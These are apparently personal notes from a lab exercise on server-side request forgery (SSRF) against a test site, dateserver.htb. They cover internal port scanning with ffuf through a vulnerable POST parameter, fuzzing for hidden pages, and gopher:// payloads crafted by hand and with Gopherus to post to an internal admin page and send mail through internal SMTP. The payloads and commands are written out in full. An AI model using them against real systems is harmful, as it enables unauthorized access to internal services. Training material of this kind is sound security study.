ENUMERATION
SERVICE/PORT SCANNING
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/availability.php&date=2024-01-01
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://127.0.0.1:80&date=2024-01-02
- change the port number to determine which ports are closed
- the error msgs on closed ports is used by ffuf to identify open ports
- "Failed to connect..."
#AUTOMATED
root@oco:~$ seq 1 10000 > ports.txt
root@oco:~$ ffuf -w ./ports.txt -u http://{targetSite:port}/{targetPage}.{tld} -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-01" -fr "Failed to connect to"
* -fr means filter regexp
* 80 [Status: 200, Size: 8285, Words: 2151, Lines: 158, Duration: 6095ms]
3306 [Status: 200, Size: 45, Words: 7, Lines: 1, Duration: 14ms]
8000 [Status: 200, Size: 37, Words: 1, Lines: 1, Duration: 51ms]PAGE FUZZING
#determine the web server's response on a non-existing page
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
input field: submit the expected user input
BURP > Proxy > Intercept > Raw
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/validPage.php&date=2024-01-01
-
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/invalidPage.php&date=2024-01-02
- the error msg is used by ffuf to identify non existent pages
root@oco:~$ ffuf -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://{targetSite:port}/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" -fr "Server at dateserver.htb Port 80"
* a "404 not found" error msg could be used, but it won't filter any HTTP 403 responses
- to do so, use "Server at dateserver.htb Port 80"
BURP > Repeater
Request
...
POST /index.php HTTP/1.1
content-type: application/x-www-form-urlencoded
dateserver=http://dateserver.htb/admin.php&date=2024-01-02
- since the dateserver.htb may be an internal resource, it is not possible to access
the /admin.php page.
- for this type of access, you'll need to use the gopher (https://datatracker.ietf.org/doc/html/rfc1436) URL scheme to send arbitrary bytes to a TCP socket.
- This protocol enables the attacker to create a POST request by building the HTTP request themselves.
#craft the payload
POST /admin.php HTTP/1.1
Host: dateserver.htb
Content-Length: 13
Content-Type: application/x-www-form-urlencoded
adminpw=admin
gopher://dateserver.htb:80/_POST%20/admin.php%20HTTP%2F1.1%0D%0AHost:%20dateserver.htb%0D%0AContent-Length:%2013%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Aadminpw%3Dadmin
* all special characters MUST be encoded spaces (%20) and newlines (%0D%0A) in particular
- since we are sending our URL within the HTTP POST parameter dateserver, which itself is URL-encoded, we need to URL-encode the entire URL again to ensure the correct format of the URL after the web server accepts it. Otherwise, we will get a Malformed URL error
#use Gopherus to construct syntactically and semantically generate correct gopher URLs
#https://github.com/tarunkant/Gopherus
#Gopherus supports the following services: MySQL, PostgreSQL, FastCGI, Redis, SMTP, Zabbix, pymemcache, rbmemcache, phpmemcache, dmpmemcache
BURP > Repeater
Request
...
POST /index.php HTTP/1.1
Host: 172.17.0.2
Content-Length: 265
Content-Type: application/x-www-form-urlencoded
dateserver=gopher%3a//dateserver.htb%3a80/_POST%2520/admin.php%2520HTTP%252F1.1%250D%250AHost%3a%2520dateserver.htb%250D%250AContent-Length%3a%252013%250D%250AContent-Type%3a%2520application/x-www-form-urlencoded%250D%250A%250D%250Aadminpw%253Dadmin&date=2024-01-01
#use the procedure below for internal SMTP (if any)
root@oco:~$ python2.7 gopherus.py
#generate a valid SMTP URL
#the generated gopher SMTP URL can then be used in SSRF exploitation
root@oco:~$ python2.7 gopherus.py --exploit smtp
Give Details to send mail:
Mail from : attacker@academy.htb
Mail To : victim@academy.htb
Subject : HelloWorld
Message : Hello from SSRF!
Your gopher link is ready to send Mail:
gopher://127.0.0.1:25/_MAIL%20FROM:attacker%40academy.htb%0ARCPT%20To:victim%40academy.htb%0ADATA%0AFrom:attacker%40academy.htb%0ASubject:HelloWorld%0AMessage:Hello%20from%20SSRF%21%0ALast updated